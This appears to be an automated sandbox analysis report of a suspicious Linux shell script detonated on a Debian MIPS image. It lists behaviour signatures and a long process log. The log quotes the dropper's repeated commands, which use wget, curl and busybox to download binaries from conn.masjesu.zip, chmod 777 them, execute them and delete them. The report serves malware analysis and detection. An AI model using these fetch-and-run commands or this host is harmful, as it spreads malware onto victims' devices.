Analysis Overview
SHA256
41cb3df665c4ff82baa293815d73e288c4209329f28c72e01b2332e9204d4c96
Threat Level: Shows suspicious behavior
The file 69e3df199d5f354bf5297b390b090569.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-24 01:26
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-24 01:26
Reported
2024-11-24 01:28
Platform
debian9-mipsbe-20240611-en
Max time kernel
94s
Max time network
97s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy | /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy | N/A |
| N/A | /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 | /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 | N/A |
| N/A | /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat | /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat | N/A |
| N/A | /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c | /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c | N/A |
| N/A | /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E | /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E | N/A |
| N/A | /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y | /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y | N/A |
| N/A | /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT | /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT | N/A |
| N/A | /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 | /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 | N/A |
| N/A | /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB | /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB | N/A |
| N/A | /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR | /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR | N/A |
| N/A | /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 | /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 | N/A |
| N/A | /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey | /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey | N/A |
| N/A | /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O | /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O | N/A |
| N/A | /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 | /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 | N/A |
| N/A | /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E | /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E | N/A |
| N/A | /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y | /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y | N/A |
| N/A | /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT | /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT | N/A |
| N/A | /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 | /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 | N/A |
| N/A | /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c | /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c | N/A |
| N/A | /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR | /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR | N/A |
| N/A | /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 | /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 | N/A |
| N/A | /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB | /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB | N/A |
| N/A | /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O | /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O | N/A |
| N/A | /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 | /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 | N/A |
| N/A | /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey | /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey | N/A |
| N/A | /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 | /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 | N/A |
| N/A | /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat | /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat | N/A |
| N/A | /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy | /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey | /usr/bin/curl | N/A |
| File opened for modification | /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c | /usr/bin/curl | N/A |
| File opened for modification | /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y | /usr/bin/curl | N/A |
| File opened for modification | /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat | /usr/bin/curl | N/A |
| File opened for modification | /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c | /usr/bin/curl | N/A |
Processes
/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
[/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/bin/chmod
[chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
[./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/bin/rm
[rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/bin/chmod
[chmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4
[./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/bin/rm
[rm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/bin/chmod
[chmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat
[./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/bin/rm
[rm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/bin/chmod
[chmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c
[./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/bin/rm
[rm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/bin/chmod
[chmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E
[./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/bin/rm
[rm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/bin/chmod
[chmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y
[./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/bin/rm
[rm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/bin/chmod
[chmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT
[./Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/bin/rm
[rm Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/bin/chmod
[chmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0
[./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/bin/rm
[rm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/bin/chmod
[chmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB
[./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/bin/rm
[rm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/bin/chmod
[chmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR
[./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/bin/rm
[rm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/bin/chmod
[chmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5
[./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/bin/rm
[rm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/bin/chmod
[chmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey
[./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/bin/rm
[rm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/bin/chmod
[chmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O
[./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/bin/rm
[rm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/bin/chmod
[chmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5
[./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/bin/rm
[rm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/bin/chmod
[chmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E
[./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/bin/rm
[rm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/bin/chmod
[chmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y
[./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/bin/rm
[rm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/bin/chmod
[chmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT
[./Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/bin/rm
[rm Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/bin/chmod
[chmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0
[./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/bin/rm
[rm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/bin/chmod
[chmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c
[./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/bin/rm
[rm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/bin/chmod
